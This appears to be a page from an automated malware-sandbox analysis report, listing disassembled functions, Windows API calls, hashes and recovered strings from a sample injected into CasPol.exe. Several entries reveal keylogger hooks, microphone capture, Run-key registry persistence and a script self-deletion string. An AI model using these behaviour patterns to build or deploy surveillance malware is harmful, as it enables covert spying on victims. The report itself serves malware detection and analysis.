Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
Opcode Fuzzy Hash: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF

Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
CloseHandle.KERNEL32(00000000), ref: 0041B61C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE

Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C

Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179

Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043811F

Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6

_UnwindNestedFrames.LIBCMT ref: 00438134
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
CallCatchBlock.LIBVCRUNTIME ref: 0043816D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4

Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8

Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
CloseHandle.KERNEL32(00000000), ref: 0041B68A

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
Opcode Fuzzy Hash: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA

Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 00418529
GetSystemMetrics.USER32(0000004D), ref: 0041852F
GetSystemMetrics.USER32(0000004E), ref: 00418535
GetSystemMetrics.USER32(0000004F), ref: 0041853B

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9

Function 0041B38D Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9

Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00421016

Strings

4[G, xrefs: 004211E1
4[G, xrefs: 00420FEC

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _memcmp
String ID: 4[G$4[G
API String ID: 2931989736-4028565467
Opcode ID: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
Opcode Fuzzy Hash: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD

Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00414BC0
GetTickCount.KERNEL32 ref: 00414C3C

Strings

>G, xrefs: 00414BEF

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: >G
API String ID: 180926312-1296849874
Opcode ID: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
Opcode Fuzzy Hash: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E

Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69

Strings

, xrefs: 0044DBAE
vD, xrefs: 0044DB5B

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Info
String ID: $vD
API String ID: 1807457897-3636070802
Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65

Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9

Strings

OCP, xrefs: 00450942
ACP, xrefs: 0045090C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358

Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E

Strings

KeepAlive | Enabled | Timeout: , xrefs: 004049E5

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
Opcode Fuzzy Hash: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F

Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

| , xrefs: 0041A6E3
%02i:%02i:%02i:%03i , xrefs: 0041A6C5

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
Opcode Fuzzy Hash: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E

Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

CloseHandle.KERNEL32(?), ref: 0040A7CA
UnhookWindowsHookEx.USER32 ref: 0040A7DD

Strings

Online Keylogger Stopped, xrefs: 0040A777, 0040A77F, 0040A7A6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
Opcode Fuzzy Hash: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB

Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D

Strings

T=G, xrefs: 004016F6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: T=G
API String ID: 2315374483-379896819
Opcode ID: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
Opcode Fuzzy Hash: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98

Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC

Strings

z=D, xrefs: 004477E3, 004477D0
IsValidLocaleName, xrefs: 004477B1, 004477BB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$z=D
API String ID: 1901932003-2791046955
Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC

Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401D96

Strings

T=G, xrefs: 00401DB7
T=G, xrefs: 00401DDB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: T=G$T=G
API String ID: 3519838083-3732185208
Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D

Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040AD5B

Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

[AltL], xrefs: 0040AD9D
[AltR], xrefs: 0040AD91

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB

Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448835

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

Strings

`@, xrefs: 00448819
`@, xrefs: 00448818

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID: `@$`@
API String ID: 1353095263-20545824
Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40

Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040ADB5

Strings

[CtrlR], xrefs: 0040ADD2
[CtrlL], xrefs: 0040ADE3

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB

Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658

Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF

Strings

pth_unenc, xrefs: 0040AF77

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98

Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

Strings

pth_unenc, xrefs: 00411699

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C

Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
GetLastError.KERNEL32 ref: 0043FB12
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
